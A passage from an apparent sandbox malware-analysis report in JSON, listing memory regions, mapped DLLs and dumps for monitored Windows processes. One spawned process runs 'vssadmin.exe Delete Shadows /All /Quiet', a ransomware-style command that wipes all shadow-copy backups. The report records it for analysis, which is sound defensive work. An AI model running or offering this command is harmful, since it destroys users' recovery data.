"c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 78905344, "timestamp": "00:01:02.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1808334848, "type": "region", "version": 1 }, "end_va": 1808875519, "entry_point": 1808341417, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1316", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1808334848, "timestamp": "00:01:02.213", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001317-addr_0x0000000004b40000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_341", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 78905344, "type": "region", "version": 1 }, "end_va": 80216063, "entry_point": 0, "filename": null, "id": "region_1317", "name": "private_0x0000000004b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 78905344, "timestamp": "00:01:02.216", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1683456, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 81899519, "entry_point": 80406197, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1318", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 80216064, "timestamp": "00:01:02.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1954676736, "type": "region", "version": 1 }, "end_va": 1956372479, "entry_point": 1954866869, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1320", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1954676736, "timestamp": "00:01:02.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4657151, "entry_point": 4653056, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1321", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 4653056, "timestamp": "00:01:02.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4792319, "entry_point": 0, "filename": null, "id": "region_1322", "name": "pagefile_0x0000000000490000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4784128, "timestamp": "00:01:02.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_1323", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:01:02.372", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1806696448, "type": "region", "version": 1 }, "end_va": 1808334847, "entry_point": 1806696448, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_1324", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1806696448, "timestamp": "00:01:02.585", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001325-addr_0x0000000004c80000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_342", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 81526783, "entry_point": 0, "filename": null, "id": "region_1325", "name": "private_0x0000000004c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 80216064, "timestamp": "00:01:02.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001326-addr_0x0000000000500000-size_0x000000000001b000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_343", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 110592, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5353471, "entry_point": 5242880, "filename": "\\Users\\kFT6uTQW\\AppData\\Local\\GDIPFONTCACHEV1.DAT", "id": "region_1326", "name": "gdipfontcachev1.dat", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\gdipfontcachev1.dat", "region_type": "memory_mapped_file", "start_va": 5242880, "timestamp": "00:01:02.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 14745599, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:01:02.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 82575360, "type": "region", "version": 1 }, "end_va": 83623935, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x0000000004ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 82575360, "timestamp": "00:01:02.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_1329", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:02.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 78905344, "type": "region", "version": 1 }, "end_va": 79953919, "entry_point": 0, "filename": null, "id": "region_1330", "name": "private_0x0000000004b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 78905344, "timestamp": "00:01:02.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 80150528, "type": "region", "version": 1 }, "end_va": 80216063, "entry_point": 0, "filename": null, "id": "region_1331", "name": "private_0x0000000004c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 80150528, "timestamp": "00:01:02.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 700416, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 80916479, "entry_point": 80216064, "filename": "\\Windows\\Fonts\\tahoma.ttf", "id": "region_1332", "name": "tahoma.ttf", "norm_filename": "c:\\windows\\fonts\\tahoma.ttf", "region_type": "memory_mapped_file", "start_va": 80216064, "timestamp": "00:01:02.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 81461248, "type": "region", "version": 1 }, "end_va": 81526783, "entry_point": 0, "filename": null, "id": "region_1333", "name": "private_0x0000000004db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81461248, "timestamp": "00:01:02.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 21663744, "start_va": 83623936, "type": "region", "version": 1 }, "end_va": 105287679, "entry_point": 83623936, "filename": "\\Windows\\Fonts\\msjh.ttf", "id": "region_1335", "name": "msjh.ttf", "norm_filename": "c:\\windows\\fonts\\msjh.ttf", "region_type": "memory_mapped_file", "start_va": 83623936, "timestamp": "00:01:02.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 21770240, "start_va": 83623936, "type": "region", "version": 1 }, "end_va": 105394175, "entry_point": 83623936, "filename": "\\Windows\\Fonts\\msyh.ttf", "id": "region_1337", "name": "msyh.ttf", "norm_filename": "c:\\windows\\fonts\\msyh.ttf", "region_type": "memory_mapped_file", "start_va": 83623936, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4337664, "start_va": 83623936, "type": "region", "version": 1 }, "end_va": 87961599, "entry_point": 83623936, "filename": "\\Windows\\Fonts\\malgun.ttf", "id": "region_1339", "name": "malgun.ttf", "norm_filename": "c:\\windows\\fonts\\malgun.ttf", "region_type": "memory_mapped_file", "start_va": 83623936, "timestamp": "00:01:02.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 655360, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 80871423, "entry_point": 80216064, "filename": "\\Windows\\Fonts\\micross.ttf", "id": "region_1341", "name": "micross.ttf", "norm_filename": "c:\\windows\\fonts\\micross.ttf", "region_type": "memory_mapped_file", "start_va": 80216064, "timestamp": "00:01:02.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 17432576, "type": "region", "version": 1 }, "end_va": 17952767, "entry_point": 17432576, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_1343", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 17432576, "timestamp": "00:01:02.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 83623936, "type": "region", "version": 1 }, "end_va": 85721087, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000004fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 83623936, "timestamp": "00:01:02.962", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001346-addr_0x0000000004c80000-size_0x0000000000130000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_344", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1245184, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 81461247, "entry_point": 0, "filename": null, "id": "region_1346", "name": "private_0x0000000004c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 80216064, "timestamp": "00:01:03.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 85721088, "type": "region", "version": 1 }, "end_va": 95354879, "entry_point": 85721088, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1347", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 85721088, "timestamp": "00:01:03.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4657151, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:04.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 397312, "start_va": 17432576, "type": "region", "version": 1 }, "end_va": 17829887, "entry_point": 17432576, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll", "id": "region_1349", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 17432576, "timestamp": "00:01:04.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 4849664, "filename": "\\Windows\\SysWOW64\\tzres.dll", "id": "region_1350", "name": "tzres.dll", "norm_filename": "c:\\windows\\syswow64\\tzres.dll", "region_type": "memory_mapped_file", "start_va": 4849664, "timestamp": "00:01:04.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5271551, "entry_point": 0, "filename": null, "id": "region_1351", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:01:04.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5316607, "entry_point": 0, "filename": null, "id": "region_1352", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:01:04.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 95354880, "type": "region", "version": 1 }, "end_va": 99495935, "entry_point": 0, "filename": null, "id": "region_1353", "name": "pagefile_0x0000000005af0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 95354880, "timestamp": "00:01:04.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1969553408, "type": "region", "version": 1 }, "end_va": 1982439423, "entry_point": 1970083329, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1355", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1969553408, "timestamp": "00:01:04.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 0, "filename": null, "id": "region_1356", "name": "pagefile_0x00000000004a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4849664, "timestamp": "00:01:04.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1957998591, "entry_point": 1957960082, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1357", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:01:04.484", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001358-addr_0x0000000000660000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_345", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 6946815, "entry_point": 0, "filename": null, "id": "region_1358", "name": "private_0x0000000000660000", "norm_filename": null, "region_type": "private_memory", "start_va": 6684672, "timestamp": "00:01:04.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 16842752, "type": "region", "version": 1 }, "end_va": 17104895, "entry_point": 0, "filename": null, "id": "region_1359", "name": "private_0x0000000001010000", "norm_filename": null, "region_type": "private_memory", "start_va": 16842752, "timestamp": "00:01:04.826", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001360-addr_0x0000000004dc0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_346", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 81526784, "type": "region", "version": 1 }, "end_va": 81788927, "entry_point": 0, "filename": null, "id": "region_1360", "name": "private_0x0000000004dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81526784, "timestamp": "00:01:04.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 99876864, "type": "region", "version": 1 }, "end_va": 100925439, "entry_point": 0, "filename": null, "id": "region_1361", "name": "private_0x0000000005f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 99876864, "timestamp": "00:01:04.826", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001362-addr_0x000000007efa4000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_347", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_1362", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:01:04.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_1363", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:01:04.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1940979712, "type": "region", "version": 1 }, "end_va": 1941057535, "entry_point": 1940987199, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_1364", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1940979712, "timestamp": "00:01:04.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 663552, "start_va": 80216064, "type": "region", "version": 1 }, "end_va": 80879615, "entry_point": 0, "filename": null, "id": "region_1365", "name": "pagefile_0x0000000004c80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 80216064, "timestamp": "00:01:04.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 81199104, "type": "region", "version": 1 }, "end_va": 81461247, "entry_point": 0, "filename": null, "id": "region_1366", "name": "private_0x0000000004d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 81199104, "timestamp": "00:01:04.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:01:04.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 81788928, "type": "region", "version": 1 }, "end_va": 82313215, "entry_point": 0, "filename": null, "id": "region_1368", "name": "private_0x0000000004e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 81788928, "timestamp": "00:01:04.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1369", "name": "pagefile_0x0000000000540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5505024, "timestamp": "00:01:04.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1370", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:04.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1371", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:04.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5640191, "entry_point": 0, "filename": null, "id": "region_1372", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:01:04.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11010048, "start_va": 1858207744, "type": "region", "version": 1 }, "end_va": 1869217791, "entry_point": 1858235285, "filename": "\\Windows\\SysWOW64\\ieframe.dll", "id": "region_1373", "name": "ieframe.dll", "norm_filename": "c:\\windows\\syswow64\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 1858207744, "timestamp": "00:01:04.969", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\cmd.exe\" vssadmin.exe Delete Shadows /All /Quiet", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_8", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001469-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_353", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1469", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:06.445", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001470-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_354", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1470", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:06.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:06.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:06.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1473", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:06.448", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001474-addr_0x00000000000f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_355", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1474", 